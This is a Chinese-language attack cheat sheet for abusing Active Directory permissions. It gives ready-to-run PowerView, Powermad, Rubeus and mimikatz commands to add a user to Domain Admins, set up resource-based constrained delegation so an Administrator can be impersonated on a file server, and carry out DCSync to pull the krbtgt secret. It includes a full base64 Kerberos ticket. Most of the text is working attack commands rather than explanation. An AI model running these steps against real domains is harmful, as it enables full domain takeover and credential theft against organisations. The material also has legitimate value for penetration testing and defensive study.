DACL滥用DCSync&On_Group&On_Computer

On Group

Add Group member

• 所有可用权限：

  • GenericAll

  • WriteProperty

  • WriteOwner

  • WriteDACL

    Add-DomainObjectAcl -TargetIdentity "CN=fileserver,CN=Users,DC=fbi,DC=gov" -PrincipalIdentity
     test1 -Rights all -Verbose
     # 添加GenericAll

直接使用命令即可把需要的用户添加到域管组

net group "Domain admins" test1 /add /domain

On Computer

基于资源的约束委派

• 所有可利用权限：

  • WriteProperty

  • WriteOwner

  • GenericAll

  • GenericWrite

  • WriteDACL

    Add-DomainObjectAcl -TargetIdentity "CN=fileserver,CN=Users,DC=fbi,DC=gov" -PrincipalIdentity
     test1 -Rights all -Verbose

• 首先创建一个机器用户来设置到fileserver的委派，使用 Powermad.ps1创建机器用户test$，域用户默认可以创建十个机器用户

  # 设置机器账户的密码
  $Password = ConvertTo-SecureString 'Passw0rd' -AsPlainText -Force
  # 通过 New-MachineAccount 函数创建机器账户
   New-MachineAccount -MachineAccount "test" -Password $($Password) -Domain "fbi.gov" -DomainCon
  troller "dc.fbi.gov" -Verbose

  

  
• 使用powerview配置test到fileserver的基于资源的约束委派

  # 获取 test 账户的 SID 为 S-1-5-21-124841762-3349575232-3850797422-3101
  Get-NetComputer "test" -Properties objectsid
  
  # 配置test到fileserver的基于资源的约束委派
  $A = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-124841762-3349575232-3850797422-3101)"
  $SDBytes = New-Object byte[] ($A.BinaryLength)
  $A.GetBinaryForm($SDBytes, 0)
  Get-DomainComputer fileserver | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose
  
  #查看是否配置成功
  Get-DomainComputer fileserver -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

  

  

  Set-DomainObject fileserver$ -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose
  # 清除msDS-AllowedToActOnBehalfOfOtherIdentity 属性的值

• 使用Rubeus 申请机器账户test$的TGT

  Rubeus.exe asktgt /user:test$ /password:Passw0rd /domain:fbi.gov /dc:dc.fbi.gov /nowrap
  
  # /user 指定要申请 TGT 的账户名
  # /password 指定机器账户 PENTEST$ 的哈希值密码
  # /domain 指定域名
  # /dc 指定域控制器

  

  
• 使用S4U2Self 扩展，伪造用户请求对fileserver的CIFS票据，然后就可以访问fileserver的目录了

  Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/fileserver.fbi.gov /dc:dc.fbi.gov /ptt /ticket:<Base64EncodedTicket>
  
  Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/fileserver.fbi.gov /dc:dc.fbi.gov /ptt /ticket:doIEljCCBJKgAwIBBaEDAgEWooIDvTCCA7lhggO1MIIDsaADAgEFoQkbB0ZCSS5HT1aiHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2ZiaS5nb3ajggN/MIIDe6ADAgESoQMCAQKiggNtBIIDaRSzX2R3XXN2SlSvV+gIEhXKdWwtEMkf/E7pJxv25LwYMIAIehIyUaJLX1BG4tp7BudrCPCsrJC9MgkBjeXLszMx0f6tuskW6G06y7NGREZe2oNUeOjT8XSzbQHsatchn92RkpYpdPlvHWGTKChzXeQ7MEP7nWlvyxt/+NZge0v8x08WmHWRfTyM3hnndtgRLaHqtfUCkX4QZB42DugWkrbDHtg3vIsDGFXVoHeVvaPqbsimEtubO9+jPr+2sZ7dg5zqdbKmKqrkoLdgTVJ/xmTLPqTb9QlCC1WwzPi14Lx5oPkrhSw4JkQxhGqz/2JPaFfVhJOrMQKVJ8tj7zkLHhHgyEtW6ko+JodmZmljuoNH+8m21xxq4tyJU7woVEoh+wyBVLuobIXbQIRwI0/7l0136xQM6fwfL0k4cj6zKh5Kr/5dEA8Ua5pjTu1XX8yQMQLVedjEOG6xgvx3TyNMa7ijRBnLz/QJK2GpkZQJPk13bkHLIGoObXzCdQq96ZYKZvrarP6ssVDHDSaRONrNXemS37pi2dLcxh9LVG0PRsOAdgoWQVyoF4P0x1XVAsTKPEqIWQKN+ZiCulIdJverdz2/nmRissN9DjvG9P6WL1csqAwfWMiYb0YRxFCJknCPNERKR3Nt/tR1DVEgqkJK5414Rjw2zeV3/M1YbzXoQ7pT8OJm2nA4U5gcJnqSG1YDQEMTfUIbmWe7iGNqHYWYqk/ixUUtfih1xJUjKKYJJxzHaZ5TP6gdrOaDzFiCbiL2vX95tsqTCj57/dWQxLqXYG6kpPzMmwKr5KO5t4TyyDKYXyC4fAsF81GqxdYUqLzbOQo/BwIKDkN8tDdaDEYiZuJfacepLx3MISLKSNfOlP9s/Cp5xU13U0bd5I5EdAOtZtvnAxOXgssaNJN418jdaGdT/63LZAPON3AXm1Z0svtGcPGs37unRu1e+HV7+IhVETZGQN/QPWE5UTat8YZZa8FE0F7pSGq0RQ7YDPcMf5HkH7usVYKTz8dw6GDqtQa2KfAnoG2NmekcTTblBc+E6MBOTsE5JNC3pHJQYgWYXH24LM8VPqJeTPOpQk5plDMEBRCERfPEc07gcNyfHgP8J/B0j90sHZRcm08trUDErfVOSaa+M2yGC9OuI7BGLoNvfp2sV3DYXGKLjqOBxDCBwaADAgEAooG5BIG2fYGzMIGwoIGtMIGqMIGnoBswGaADAgEXoRIEEJfCoVwTDq0XEGH0BSTOPIehCRsHRkJJLkdPVqISMBCgAwIBAaEJMAcbBXRlc3QkowcDBQBA4QAApREYDzIwMjMwMTEwMDM1NDQ1WqYRGA8yMDIzMDExMDEzNTQ0NVqnERgPMjAyMzAxMTcwMzU0NDVaqAkbB0ZCSS5HT1apHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2ZiaS5nb3Y=

  

  

DCSync

配置

利用

lsadump::dcsync /domain:fbi.gov /user:krbtgt

• 所有可利用权限

  • GenericAll

  • 所有扩展权限

  • 复制目录更改所有项(1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)+复制目录更改(1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

    

    
  • WriteDACL

    Add-DomainObjectAcl -TargetIdentity "DC=fbi,DC=gov" -PrincipalIdentity test1 -Rights DCSync -Verbose
    # 给test1用户添加DCSync权限，这里额外添加了 正在复制筛选集中的目录更改 权限，经过测试是不需要这个权限的